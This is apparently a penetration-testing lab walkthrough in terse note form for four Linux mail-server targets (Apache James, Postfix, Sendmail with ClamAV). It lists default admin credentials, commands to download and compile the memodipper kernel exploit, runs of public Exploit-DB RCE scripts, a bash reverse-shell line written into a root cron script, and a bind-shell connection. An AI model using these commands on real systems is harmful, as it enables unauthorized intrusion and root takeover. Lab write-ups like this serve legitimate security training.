Mail 1: Apache James
Target: Linux
Foothold: Misconfiguration
Admin CLI
nc $target 4555
Login id: root
Password: root
listusers
setpassword <user> <newpassword>
IMAP/POP3 Client
- Access user mailbox
- Find SSH credentials
Privilege Escalation: Kernel exploit
- Good resource here for kernel version checks
-
Ubuntu 11.10 3.0.0-12-generic-pae
# Download memodipper.c to Kali
# Start python web server
# Download and compile on target
cd /tmp
wget http://$kaliIP/memodipper.c
gcc memodipper.c -o pwn
chmod +x pwn
./pwn
Mail 2: Postfix
Target: Linux
Foothold:: Misconfiguration & Postfix Shellshock
-
nmapscan shows local domain ismail.local - List SMB shares
smbclient -L //$target -U '' --option="client min protocol=core"
- SMB allows anonymous login
- SMB shares reveal user home directories and usernames
- Connect to Postfix service
nc $target 25
VRFY admin@mail.local
- Receive confirmation of user existence
- Check searchsploit for Postfix version
searchsploit postfix
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote C | linux/remote/34896.py
- Google search for Postfix shellshock
wget https://raw.githubusercontent.com/3mrgnc3/pentest_old/master/postfix-shellshock-nc.py
- Start listener
sudo nc -lnvp $tcpPort
- Run the exploit
python2 postfix-shellshock-nc.py $target admin@mail.local $kaliIP $tcpPort
Privilege Escalation: Cron job running as root
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/$kaliIP/$tcpPort 0>&1' > my-script.sh
- Start a listener
- Wait for cron to trigger the script
Mail 3: Apache James
Target: Linux
Foothold: RCE
- Apache James version is vulnerable to RCE
-
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py - Copy the exploit
- Change the payload
- Set the user and password to
root:root - Run
python2 35513.py $target - Start
msfconsoleand useexploit/multi/handler
set lhost <kali ip>
set lport <tcp port>
run
Privilege Escalation: File permissions
-
/etc/init.d/jamesis world-writeable - Modify the start-up script with a new reverse shell
- I am able to run
sudo reboot - Start listener
- Catch new shell
Mail 4: Sendmail + ClamAV Milter
Target: Linux
Foothold: RCE
- Initial TCP port scan showed Sendmail and SNMP
- UDP port scan revealed SNMP port
- Ran all SNMP Nmap scripts against the UDP port
- Found interesting process of ClamAV acting as Sendmail milter
- Searchsploit for Clam AV and triangulated on Sendmail
- Exploit DB ID:
4761.pl - Exploit opens a bind shell on 31337 on the target using Clam AV milter
- Run the exploit
perl 4761.pl $target
- Connect to the bind shell
nc -nv $target 31337